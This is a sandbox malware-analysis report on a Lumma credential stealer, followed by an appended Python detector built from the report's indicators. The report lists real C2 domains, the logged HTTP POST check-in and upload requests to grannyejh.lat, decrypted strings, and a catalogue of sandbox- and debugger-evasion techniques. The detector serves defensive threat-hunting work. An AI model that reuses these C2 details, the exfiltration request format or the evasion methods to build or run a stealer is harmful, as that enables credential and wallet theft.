Windows Analysis Report
661fW9gxDp.exe

Overview

General Information

Sample name: 661fW9gxDp.exe (renamed because the original name is a hash value)
Original sample name: 18c608e128d658aef6e267668ddb68e2.exe
Analysis ID: 1578074
MD5: 18c608e128d658aef6e267668ddb68e2
SHA1: 8da573d37440d3761aa89abec9f9efc0ee8773a6
SHA256: 1fe8d27012da0553ebe43b42313f32264779c2bc697df26bba458348dfec6607
Tags: exe, user-abuse_ch

Detection

Malware family: LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process tree:
  • System is w10x64
  • 661fW9gxDp.exe (PID: 7684, cmdline: "C:\Users\user\Desktop\661fW9gxDp.exe", MD5: 18C608E128D658AEF6E267668DDB68E2)
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat", "sweepyribs.lat", "necklacebudi.lat", "discokeyus.lat", "rapeflowwj.lat"], "Build id": "PsFKDg--pablo"}
Yara matches:

Source                                          Rule                           Description                       Author
sslproxydump.pcap                               JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
sslproxydump.pcap                               JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security
Process Memory Space: 661fW9gxDp.exe PID: 7684  JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
Process Memory Space: 661fW9gxDp.exe PID: 7684  JoeSecurity_CredentialStealer  Yara detected Credential Stealer  Joe Security
Process Memory Space: 661fW9gxDp.exe PID: 7684  JoeSecurity_LummaCStealer      Yara detected LummaC Stealer      Joe Security
decrypted.memstr                                JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security

No Sigma rule has matched
Suricata IDS alerts (one row per alert, grouped by SID as in the original tables):

Timestamp                        SID      Severity  Classtype                                      Source             Destination       Protocol
2024-12-19T08:36:34.600746+0100  2028371  3         Unknown Traffic                                192.168.2.9:49717  104.21.64.80:443  TCP
2024-12-19T08:36:36.729541+0100  2028371  3         Unknown Traffic                                192.168.2.9:49723  104.21.64.80:443  TCP
2024-12-19T08:36:39.215752+0100  2028371  3         Unknown Traffic                                192.168.2.9:49728  104.21.64.80:443  TCP
2024-12-19T08:36:41.495031+0100  2028371  3         Unknown Traffic                                192.168.2.9:49734  104.21.64.80:443  TCP
2024-12-19T08:36:43.756933+0100  2028371  3         Unknown Traffic                                192.168.2.9:49742  104.21.64.80:443  TCP
2024-12-19T08:36:46.568113+0100  2028371  3         Unknown Traffic                                192.168.2.9:49749  104.21.64.80:443  TCP
2024-12-19T08:36:49.282619+0100  2028371  3         Unknown Traffic                                192.168.2.9:49758  104.21.64.80:443  TCP
2024-12-19T08:36:53.055358+0100  2028371  3         Unknown Traffic                                192.168.2.9:49769  104.21.64.80:443  TCP
2024-12-19T08:36:35.509186+0100  2054653  1         A Network Trojan was detected                  192.168.2.9:49717  104.21.64.80:443  TCP
2024-12-19T08:36:37.545026+0100  2054653  1         A Network Trojan was detected                  192.168.2.9:49723  104.21.64.80:443  TCP
2024-12-19T08:36:35.509186+0100  2049836  1         A Network Trojan was detected                  192.168.2.9:49717  104.21.64.80:443  TCP
2024-12-19T08:36:37.545026+0100  2049812  1         A Network Trojan was detected                  192.168.2.9:49723  104.21.64.80:443  TCP
2024-12-19T08:36:34.600746+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49717  104.21.64.80:443  TCP
2024-12-19T08:36:36.729541+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49723  104.21.64.80:443  TCP
2024-12-19T08:36:39.215752+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49728  104.21.64.80:443  TCP
2024-12-19T08:36:41.495031+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49734  104.21.64.80:443  TCP
2024-12-19T08:36:43.756933+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49742  104.21.64.80:443  TCP
2024-12-19T08:36:46.568113+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49749  104.21.64.80:443  TCP
2024-12-19T08:36:49.282619+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49758  104.21.64.80:443  TCP
2024-12-19T08:36:53.055358+0100  2058365  1         Domain Observed Used for C2 Detected           192.168.2.9:49769  104.21.64.80:443  TCP
2024-12-19T08:36:33.224767+0100  2058364  1         Domain Observed Used for C2 Detected           192.168.2.9:65432  1.1.1.1:53        UDP
2024-12-19T08:36:33.085082+0100  2058378  1         Domain Observed Used for C2 Detected           192.168.2.9:58066  1.1.1.1:53        UDP
2024-12-19T08:36:47.431200+0100  2048094  1         Malware Command and Control Activity Detected  192.168.2.9:49749  104.21.64.80:443  TCP
2024-12-19T08:36:49.286427+0100  2843864  1         A Network Trojan was detected                  192.168.2.9:49758  104.21.64.80:443  TCP


              AV Detection

Source: 661fW9gxDp.exe | Avira: detected
Source: https://grannyejh.lat/k | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/L | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat:443/apiy | Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/6 | Avira URL Cloud: Label: malware
Source: 661fW9gxDp.exe.7684.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat", "sweepyribs.lat", "necklacebudi.lat", "discokeyus.lat", "rapeflowwj.lat"], "Build id": "PsFKDg--pablo"}
Source: 661fW9gxDp.exe | Virustotal: Detection: 50%
Source: 661fW9gxDp.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 661fW9gxDp.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: 661fW9gxDp.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49758 version: TLS 1.2
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: number of queries: 1001

              Networking

Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.9:58066 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.9:65432 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49728 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49723 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49717 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49734 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49742 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49758 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49749 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49769 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49723 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49723 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49749 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49758 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49717 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49717 -> 104.21.64.80:443
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Joe Sandbox View | IP Address: 104.21.64.80
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49717 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49742 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49758 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49749 -> 104.21.64.80:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49769 -> 104.21.64.80:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=PAPFBR4QJTLV5VS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12827
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=J0AX77C9TIVJ7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15033
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=PEPULYB9QC75IWHJ1QG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20585
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=XEG88966N4N
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1180
    Host: grannyejh.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1B66W53CLPJIG2NL2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 584873
    Host: grannyejh.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: grannyejh.lat
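Added example, not part of the Joe Sandbox report and not code from the sample: a small Python detector that turns the network observations above into checks a SOC could run over Suricata eve.json output. It matches DNS lookups, TLS SNI and HTTP Host values against the C2 domains from the extracted configuration, matches the JA3 hash recorded above, and, independently of any domain IOC, flags the request shape seen in this capture: an application/x-www-form-urlencoded POST to /api (the check-in) followed by multipart/form-data POSTs to the same host (the uploads) under one consistent user agent. The sequence check deliberately does not key on a user-agent string, because the decrypted strings contain "TeslaBrowser/5.5" (as in the Malpedia description) while the requests actually sent carry a Chrome 119 user agent. Field names follow what Suricata emits for dns, tls and http events; reading the request Content-Type from request_headers assumes HTTP logging with dump-all-headers enabled. The log records are constructed for the example, not taken from the analysis pcap.

```python
import json
from collections import defaultdict

# IOCs copied from the extracted malware configuration and the Networking section.
C2_DOMAINS = {
    "crosshuaht.lat", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat",
    "grannyejh.lat", "sweepyribs.lat", "necklacebudi.lat", "discokeyus.lat",
    "rapeflowwj.lat",
}
JA3_IOC = "a0e9f5d64349fb13191bc781f81f42e1"
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

def is_c2_domain(name):
    """True if name is a configured C2 domain or a subdomain of one."""
    name = name.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in C2_DOMAINS)

def request_header(http, name):
    """Read one request header from an eve.json http record. Suricata fills
    request_headers only with dump-all-headers enabled (assumed here)."""
    headers = {h.get("name", "").lower(): h.get("value", "")
               for h in http.get("request_headers", [])}
    return headers.get(name.lower(), "")

def check_event(ev):
    """Return (tag, detail) findings for a single eve.json record."""
    findings, kind = [], ev.get("event_type")
    if kind == "dns":
        rrname = ev.get("dns", {}).get("rrname", "")
        if is_c2_domain(rrname):
            findings.append(("c2_dns_lookup", rrname))
    elif kind == "tls":
        tls = ev.get("tls", {})
        if is_c2_domain(tls.get("sni", "")):
            findings.append(("c2_tls_sni", tls["sni"]))
        if tls.get("ja3", {}).get("hash") == JA3_IOC:
            findings.append(("ja3_match", ev.get("dest_ip", "")))
    elif kind == "http":
        hostname = ev.get("http", {}).get("hostname", "")
        if is_c2_domain(hostname):
            findings.append(("c2_http_host", hostname))
    return findings

def detect_beacon_sequence(events):
    """Flag hosts that receive the POST /api pattern this report records: an
    application/x-www-form-urlencoded POST (check-in) followed by at least one
    multipart/form-data POST (upload) to the same host, all under one user
    agent. Needs no domain IOC, so it also catches a rotated C2 domain."""
    per_host = defaultdict(list)
    for ev in events:
        http = ev.get("http", {})
        if (ev.get("event_type") == "http" and http.get("http_method") == "POST"
                and http.get("url") == "/api"):
            per_host[http.get("hostname", "")].append(http)
    hits = []
    for host, reqs in per_host.items():
        if len({r.get("http_user_agent") for r in reqs}) != 1:
            continue  # mixed user agents: not the single-client beacon shape
        saw_checkin = False
        for ctype in (request_header(r, "Content-Type") for r in reqs):
            if ctype.startswith("application/x-www-form-urlencoded"):
                saw_checkin = True
            elif ctype.startswith("multipart/form-data") and saw_checkin:
                hits.append(host)
                break
    return sorted(hits)

def scan(eve_text):
    """Run both checks over newline-delimited eve.json text."""
    events = [json.loads(ln) for ln in eve_text.splitlines() if ln.strip()]
    return [f for ev in events for f in check_event(ev)], detect_beacon_sequence(events)

def make_http_record(host, ctype):
    # Build one constructed http record in eve.json shape.
    return json.dumps({"event_type": "http", "dest_ip": "104.21.64.80", "http": {
        "hostname": host, "url": "/api", "http_method": "POST", "http_user_agent": UA,
        "request_headers": [{"name": "Content-Type", "value": ctype}]}})

# Constructed sample log modelled on the sequence in the Networking section;
# it is not the pcap from the analysis. The last record is a benign control.
SAMPLE_LOG = "\n".join([
    json.dumps({"event_type": "dns", "dns": {"type": "query", "rrname": "sweepyribs.lat"}}),
    json.dumps({"event_type": "dns", "dns": {"type": "query", "rrname": "grannyejh.lat"}}),
    json.dumps({"event_type": "tls", "dest_ip": "104.21.64.80",
                "tls": {"sni": "grannyejh.lat", "version": "TLS 1.2", "ja3": {"hash": JA3_IOC}}}),
    make_http_record("grannyejh.lat", "application/x-www-form-urlencoded"),
    make_http_record("grannyejh.lat", "application/x-www-form-urlencoded"),
    make_http_record("grannyejh.lat", "multipart/form-data; boundary=PAPFBR4QJTLV5VS"),
    make_http_record("grannyejh.lat", "multipart/form-data; boundary=1B66W53CLPJIG2NL2"),
    make_http_record("files.example.org", "multipart/form-data; boundary=abc"),
])

if __name__ == "__main__":
    findings, beacons = scan(SAMPLE_LOG)
    print("\n".join(f"{tag:14} {detail}" for tag, detail in findings))
    print("beacon sequence hosts:", beacons)
```

Run it as a script to see the findings for the constructed log; to use it on a real sensor, feed the contents of eve.json to scan(). The domain checks are the cheap, high-confidence part and go stale as soon as the operator rotates domains (the configuration above already carries nine); the sequence check is the part worth keeping, and it should be tuned against your own traffic, since any site that accepts a form login before a file upload on the same path will look similar.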
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 661fW9gxDp.exe, 00000000.00000003.1575776408.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microHM
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
